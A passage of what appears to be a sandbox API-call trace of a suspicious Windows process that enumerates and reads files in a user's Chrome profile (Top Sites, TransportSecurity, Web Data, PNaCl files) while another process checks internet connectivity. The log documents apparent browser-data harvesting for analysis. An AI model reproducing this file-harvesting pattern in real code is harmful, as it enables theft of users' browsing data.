\xde\x0f6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:41,644 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c8 |
FAILURE | 3221225489 | |
| 07:44:41,644 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Top Sites-journal DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:41,684 | 504 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:41,775 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c8 |
FAILURE | 3221225489 | |
| 07:44:41,785 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\TransportSecurity DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:41,785 | 504 | NtReadFile |
Buffer => {
"0J7rAWV0ouCFYJ9XrkDiKnAO1SshXJmLJE1SS3V8kDM=": {
"dynamic_spki_hashes_expiry": 0.0,
"expiry": 1414743547.336582,
"mode": "force-https",
"pkp_include_subdomains": false,
"pkp_observed": 1403857143.556582,
"st FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:41,795 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c8 |
FAILURE | 3221225489 | |
| 07:44:41,795 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:41,805 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:41,805 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:41,805 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x00182d20 | |
| 07:44:41,805 | 1308 | OpenServiceW |
ServiceControlManager => 0x00182d20 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x0016bf48 | |
| 07:44:41,805 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:41,805 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:41,805 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:41,875 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Applications\*.* |
SUCCESS | 0x0016bdd8 | |
| 07:44:41,875 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\x1f\xf2j\xe0\x91\xcf\x01\xb0\x1f\xf2j\xe0\x91\xcf\x01\xb0\x1f\xf2j\xe0\x91\xcf\x01\xb0\x1f\xf2j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x000\x000\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x1f\xf2j\xe0\x91\xcf\x01\xd0\xbd\x13k\xe0\x91\xcf\x01\xd0\xbd\x13k\xe0\x91\xcf\x01\xd0\xbd\x13k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00J\x00\x00\x00\x00\x00\x00\x00\x10\x00_\x00C\x00R\x00X\x00_\x00A\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00_\x00c\x00r\x00x\x00_\x00a\x00o\x00h\x00g\x00h\x00m\x00i\x00g\x00h\x00l\x00i\x00e\x00i\x00a\x00i\x00n\x00n\x00e\x00g\x00k\x00c\x00i\x00j\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:41,875 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:41,955 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Applications\_crx_aohghmighlieiainnegkcijnfilokake\*.* |
SUCCESS | 0x0016be10 | |
| 07:44:41,955 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\x1f\xf2j\xe0\x91\xcf\x01\xd0\xbd\x13k\xe0\x91\xcf\x01\x90\xda\x19k\xe0\x91\xcf\x01\x90\xda\x19k\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00414743\x80\x00\x00\x00\x00\x00\x00\x00P\x84\x07k\xe0\x91\xcf\x01\x10\xa1 k\xe0\x91\xcf\x01\x10\xa1 k\xe0\x91\xcf\x01\x90\xda\x19k\xe0\x91\xcf\x01\xab\x9c\x02\x00\x00\x00\x00\x00\x00\xa0\x02\x00\x00\x00\x00\x00 \x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x18\x00G\x00O\x00O\x00G\x00L\x00E\x00~\x001\x00.\x00I\x00C\x00O\x00G\x00o\x00o\x00g\x00l\x00e\x00 \x00D\x00o\x00c\x00s\x00.\x00i\x00c\x00o\x00 ( )\x00\x00\x00\x00\x00\x00\x00\x00\x90\xda\x19k\xe0\x91\xcf\x01\x90\xda\x19k\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:41,955 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:41,955 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:41,955 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data-journal DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:41,975 | 504 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:42,015 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:42,025 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:42,025 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:42,215 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\PepperFlash\*.* |
SUCCESS | 0x00169d88 | |
| 07:44:42,225 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b8 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\x90\x96\xacZ\xe0\x91\xcf\x01\x90\x96\xacZ\xe0\x91\xcf\x01\x90\x96\xacZ\xe0\x91\xcf\x01\x90\x96\xacZ\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:42,225 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:42,225 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:42,305 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\pnacl\*.* |
SUCCESS | 0x00169d88 | |
| 07:44:42,305 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\xa7n[\xe0\x91\xcf\x01\x80\x86\xafu\xe3\x91\xcf\x01\x80\x86\xafu\xe3\x91\xcf\x01\x80\x86\xafu\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00o\x00r\x00a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10j!u\xe3\x91\xcf\x01\xc0\xc2\xf2u\xe3\x91\xcf\x01\xa0>\xa0u\xe3\x91\xcf\x01\xc0\xc2\xf2u\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x12\x000\x001\x000\x00~\x001\x00.\x001\x002\x009\x00\x00\x00\x00\x00\x00\x000\x00.\x001\x00.\x000\x00.\x001\x002\x009\x001\x009\x00 |
SUCCESS | 0x00000000 | |
| 07:44:42,305 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:42,405 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\pnacl\0.1.0.12919\*.* |
SUCCESS | 0x0016bdd8 | |
| 07:44:42,405 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10j!u\xe3\x91\xcf\x01\xc0\xc2\xf2u\xe3\x91\xcf\x01\xa0>\xa0u\xe3\x91\xcf\x01\xc0\xc2\xf2u\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x000\x000\x000\x00\x88\x00\x00\x00\x00\x00\x00\x00p\xb7\x9eu\xe3\x91\xcf\x01\xa0>\xa0u\xe3\x91\xcf\x01\xa0>\xa0u\xe3\x91\xcf\x01\xa0>\xa0u\xe3\x91\xcf\x01B\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00A\x00N\x00I\x00F\x00E\x00~\x001\x00.\x00F\x00I\x00N\x00m\x00a\x00n\x00i\x00f\x00e\x00s\x00t\x00.\x00f\x00i\x00n\x00g\x00e\x00r\x00p\x00r\x00i\x00n\x00t\x00n\x00x\x00\x00\x00\x00\x00\x00\x00p\xb7\x9eu\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:42,405 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:42,496 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\pnacl\0.1.0.12919\_platform_specific\*.* |
SUCCESS | 0x0016be10 | |
| 07:44:42,496 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\x0e)u\xe3\x91\xcf\x01\xc0\xc2\xf2u\xe3\x91\xcf\x01\x00\x0e)u\xe3\x91\xcf\x01\x00\x0e)u\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00n \x94 \xe1 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e)u\xe3\x91\xcf\x01\xc0\xc2\xf2u\xe3\x91\xcf\x01`\x02]u\xe3\x91\xcf\x01`\x02]u\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x008\x006\x00_\x003\x002\x00 |
SUCCESS | 0x00000000 | |
| 07:44:42,496 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:42,586 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\pnacl\0.1.0.12919\_platform_specific\x86_32\*.* |
SUCCESS | 0x0016be48 | |
| 07:44:42,586 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x00\x0e)u\xe3\x91\xcf\x01\xc0\xc2\xf2u\xe3\x91\xcf\x01`\x02]u\xe3\x91\xcf\x01`\x02]u\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\xe1\xe1\xe1\xe1\xe1\xe1\x90\x00\x00\x00\x00\x00\x00\x00\x90\xa3-u\xe3\x91\xcf\x01\xdc:-u\xe3\x91\xcf\x01\x00?\x96\xad\xefR\xcf\x01\x90\xa3-u\xe3\x91\xcf\x01\xb7\x01\x00\x00\x00\x00\x00\x00\xb8\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x10\x00P\x00N\x008\x001\x002\x00A\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x00n\x00a\x00c\x00l\x00_\x00p\x00u\x00b\x00l\x00i\x00c\x00_\x00p\x00n\x00a\x00c\x00l\x00_\x00j\x00s\x00o\x00n\x00\xe1\xe1\xe1\xe1\xa8\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:42,586 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\pnacl\0.1.0.12919\_platform_specific\x86_32\pnacl_public_pnacl_json DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:42,586 | 504 | NtReadFile |
Buffer => {
"COMMENT": [
"This file serves as a template for the resource info description used by ",
"the NaCl Chrome plugin. It is kept in the NaCl repository to prevent ",
"hard-coding of NaCl-specific information inside the Chrome FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:42,596 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:42,596 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\pnacl\0.1.0.12919\_platform_specific\x86_32\pnacl_public_x86_32_crtbegin_for_eh_o DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:42,606 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:42,606 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:42,606 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:42,606 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:42,606 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:42,606 | 504 | NtReadFile |
Buffer => \x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00t\x02\x00\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00(\x00
\x00
\x00\x01\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\xb8\x01\x00\x00\x00Y\x83\xe1\xe0\xff\xe1ffffff.\x0f\x1f\x84\x00\x00\x00\x00\x00f\x0f\x1fD\x00\x001\xc0+D$\x04Y\x83\xe1\xe0\xff\xe1ffffff.\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1fD\x00\x001\xc0Y\x83\xe1\xe0\xff\xe1ffffff.\x0f\x1f\x84\x00\x00\x00\x00\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00\x83\xec\x0c\x8bD$\x10\x89\x04$ffffff.\x0f\x1f\x84\x00\x00\x00\x00\x00f\x90\xe8\xfc\xff\xff\xff\xc7D$\x04\x00\x00\x00\x00\xc7\x04$\x00\x00\x00\x00fff.\x0f\x1f\x84\x00\x00\x00\x00\x00\xe8\xfc\xff\xff\xff\x83\xc4\x0c\xe9\xfc\xff\xff\xffffffff.\x0f\x1f\x84\x00\x00\x00\x00\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:42,626 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:42,626 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\pnacl\0.1.0.12919\_platform_specific\x86_32\pnacl_public_x86_32_crtbegin_o DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:42,626 | 504 | NtReadFile |
Buffer => \x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x02\x00\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00(\x00\x0c\x00 \x00\x01\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\xb8\x01\x00\x00\x00Y\x83\xe1\xe0\xff\xe1ffffff.\x0f\x1f\x84\x00\x00\x00\x00\x00f\x0f\x1fD\x00\x001\xc0+D$\x04Y\x83\xe1\xe0\xff\xe1ffffff.\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1fD\x00\x001\xc0Y\x83\xe1\xe0\xff\xe1ffffff.\x0f\x1f\x84\x00\x00\x00\x00\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00Y\x83\xe1\xe0\xff\xe1ffffff.\x0f\x1f\x84\x00\x00\x00\x00\x00ff.\x0f\x1f\x84\x00\x00\x00\x00\x00Y\x83\xe1\xe0\xff\xe1ffffff.\x0f\x1f\x84\x00\x00\x00\x00\x00ff.\x0f\x1f\x84\x00\x00\x00\x00\x00\x83\xec\x0c\x8bD$\x10\x89\x04$ffffff.\x0f\x1f\x84\x00\x00\x00\x00\x00f\x90\xe8\xfc\xff\xff\xff FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:42,636 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:42,646 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\pnacl\0.1.0.12919\_platform_specific\x86_32\pnacl_public_x86_32_crtend_o DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:42,646 | 504 | NtReadFile |
Buffer => \x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x01\x00\x00\x00\x00\x00\x004\x00\x00\x00\x00\x00(\x00\x0c\x00 \x00\x01\x00\x00\x00\x05\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00NaCl\x00\x00\x00\x00x86-32\x00\x00\x00\x00\x00\x00\x00clang version 3.4 (https://chromium.googlesource.com/native_client/pnacl-clang.git c9e11978abdba970b12b46ab792634f0a98319d7) (https://chromium.googlesource.com/nat FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:42,656 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:42,656 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\pnacl\0.1.0.12919\_platform_specific\x86_32\pnacl_public_x86_32_libcrt_platform_a DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:42,656 | 504 | NtReadFile |
Buffer => !<arch>
/ 1395442728 0 0 0 120 `
\x00\x00\x00 \x00\x00\x00\xbc\x00\x00 p\x00\x00\x10\xb0\x00\x00\x10\xb0\x00\x00\x1c\xd4\x00\x00\x1c\xd4\x00\x00 P\x00\x00 P\x00\x00 Pfmod\x00fmodf\x00__nacl_read_tp\x00__pnacl_init_irt\x00longjmp\x00setjmp\x00memcpy\x00memmove\x00memset\x00e_fmod.o/ 1395442727 1001 1001 100600 2168 `
\x7fELF\x01\x01\x01\x00 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:42,766 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:42,766 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\pnacl\0.1.0.12919\_platform_specific\x86_32\pnacl_public_x86_32_libpnacl_irt_shim_a DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:42,776 | 504 | NtReadFile |
Buffer => !<arch>
/ 1396918724 0 0 0 94 `
\x00\x00\x00\x03\x00\x00\x00\xa2\x00\x00\x06\x1e\x00\x00\x06\x1e_pnacl_wrapper_start\x00__pnacl_real_irt_query_func\x00__pnacl_wrap_irt_query_func\x00\x00shim_entry.o/ 1396918724 1070215000 100640 1344 `
\x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x02 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:42,776 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:42,776 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\pnacl\0.1.0.12919\_platform_specific\x86_32\pnacl_public_x86_32_libpnacl_irt_shim_dummy_a DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:42,776 | 504 | NtReadFile |
Buffer => !<arch>
/ 1395442734 0 0 0 30 `
\x00\x00\x00\x01\x00\x00\x00\xb2_pnacl_wrapper_start\x00\x00// 20 `
dummy_shim_entry.o/
/0 1395442734 1001 1001 100600 1368 `
\x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:42,786 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:42,786 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:42,786 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:42,786 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:42,786 | 504 | NtQueryDirectoryFile |
